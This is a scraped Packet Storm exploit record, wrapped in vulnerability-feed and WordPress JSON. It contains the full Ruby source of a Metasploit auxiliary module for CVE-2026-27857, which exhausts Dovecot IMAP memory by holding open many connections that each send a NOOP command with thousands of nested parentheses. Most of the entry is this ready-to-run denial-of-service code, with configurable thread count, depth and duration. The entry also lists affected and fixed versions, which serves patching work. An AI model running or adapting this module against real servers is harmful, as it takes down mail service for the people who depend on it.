{“lastseen”:”2026-04-22T16:27:30″,”description”:”This Metasploit auxiliary module targets a memory exhaustion vulnerability in the Dovecot IMAP service. It opens multiple concurrent TCP connections and sends specially crafted NOOP commands containing deeply nested parentheses to force excessive…”,”published”:”2026-04-22T00:00:00″,”modified”:”2026-04-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Dovecot IMAP NOOP Command Memory Exhaustion Denial of Service”,”source”:””,”references”:””,”id”:”PACKETSTORM:219556″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-27857″],”sourceData”:”==================================================================================================================================\\n | # Title : Dovecot IMAP NOOP Command Memory Exhaustion Denial of Service |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/www.dovecotpro.com\/ |\\n ==================================================================================================================================\\n \\n [+] Summary : This Metasploit auxiliary module targets a memory exhaustion vulnerability in the Dovecot IMAP service. \\n It opens multiple concurrent TCP connections and sends specially crafted NOOP commands containing deeply nested parentheses to force excessive memory allocation on the server. \\n \\t\\t\\t\\t By sustaining these connections for a configurable duration, the module attempts to exhaust system memory, potentially leading to service instability or crash. \\n It is classified as a denial-of-service (DoS) attack affecting specific Dovecot versions.\\n \\n \\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Auxiliary::Dos\\n include Msf::Exploit::Remote::Tcp\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Dovecot IMAP NOOP Command Memory Exhaustion DoS’,\\n ‘Description’ =\\u003e %q{\\n Dovecot imap-login service is vulnerable to memory exhaustion through specially\\n crafted NOOP commands. Sending a NOOP command with 4000 nested parentheses\\n causes ~1MB of memory allocation per connection. By opening multiple connections\\n without sending the terminating LF, an attacker can cause memory exhaustion\\n leading to service crash.\\n \\n An attacker can create 1000 connections to allocate 1GB of memory, triggering\\n VSZ limit and killing the process along with its proxied connections.\\n \\n Affects Dovecot Pro core 2.3.0+, Dovecot Pro core 3.1.0+, Dovecot CE core 2.4.0+.\\n Fixed in versions 2.4.3, 3.0.5, 3.1.4, and 2.3.22.1.\\n },\\n ‘Author’ =\\u003e [\\n ‘indoushka’\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2026-27857’],\\n [‘URL’, ‘https:\/\/documentation.open-xchange.com\/dovecot\/security\/advisories\/html\/2026\/oxdc-adv-2026-0001.html’],\\n [‘CWE’, ‘400’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘DisclosureDate’ =\\u003e ‘2026-03-27’\\n )\\n )\\n \\n register_options([\\n Opt::RPORT(143),\\n OptInt.new(‘THREADS’, [true, ‘Number of concurrent connections’, 100]),\\n OptInt.new(‘PARENTHESIS_DEPTH’, [true, ‘Number of nested parentheses’, 4000]),\\n OptInt.new(‘DURATION’, [true, ‘Duration of attack in seconds’, 30])\\n ])\\n end\\n \\n def run\\n print_status(\\”Dovecot IMAP NOOP Memory Exhaustion DoS (CVE-2026-27857)\\”)\\n print_status(\\”Target: #{peer}\\”)\\n \\n threads = []\\n start_time = Time.now\\n \\n print_status(\\”Starting DoS attack with #{datastore[‘THREADS’]} threads…\\”)\\n \\n datastore[‘THREADS’].times do |i|\\n threads \\u003c\\u003c framework.threads.spawn(\\”DovecotDoS-#{i}\\”, false) do\\n attack_connection\\n end\\n end\\n \\n while (Time.now – start_time) \\u003c datastore[‘DURATION’]\\n sleep(5)\\n print_status(\\”Attack ongoing… (#{(Time.now – start_time).round}\/#{datastore[‘DURATION’]}s)\\”)\\n end\\n \\n print_status(\\”Stopping attack…\\”)\\n threads.each(\\u0026:kill)\\n print_status(\\”Attack completed\\”)\\n end\\n \\n def attack_connection\\n sock = nil\\n \\n begin\\n sock = connect\\n \\n banner = sock.get_once\\n vprint_status(\\”Connected, banner: #{banner}\\”)\\n parentheses = \\”(\\” * datastore[‘PARENTHESIS_DEPTH’]\\n parentheses += \\”)\\” * datastore[‘PARENTHESIS_DEPTH’]\\n sock.put(\\”a1 NOOP #{parentheses}\\\\r\\\\n\\”)\\n sleep(datastore[‘DURATION’])\\n \\n rescue ::Exception =\\u003e e\\n vprint_error(\\”Connection error: #{e.message}\\”)\\n ensure\\n disconnect(sock) if sock\\n end\\n end\\n end\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219556″,”cvss”:{“score”:4.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:N\/A:L”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219556\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-22T16:27:30″,”description”:”This Metasploit auxiliary module targets a memory exhaustion vulnerability in the Dovecot IMAP service. It opens multiple concurrent TCP connections and sends specially crafted NOOP…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,21,13,53,7,11,5],"class_list":["post-48742","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n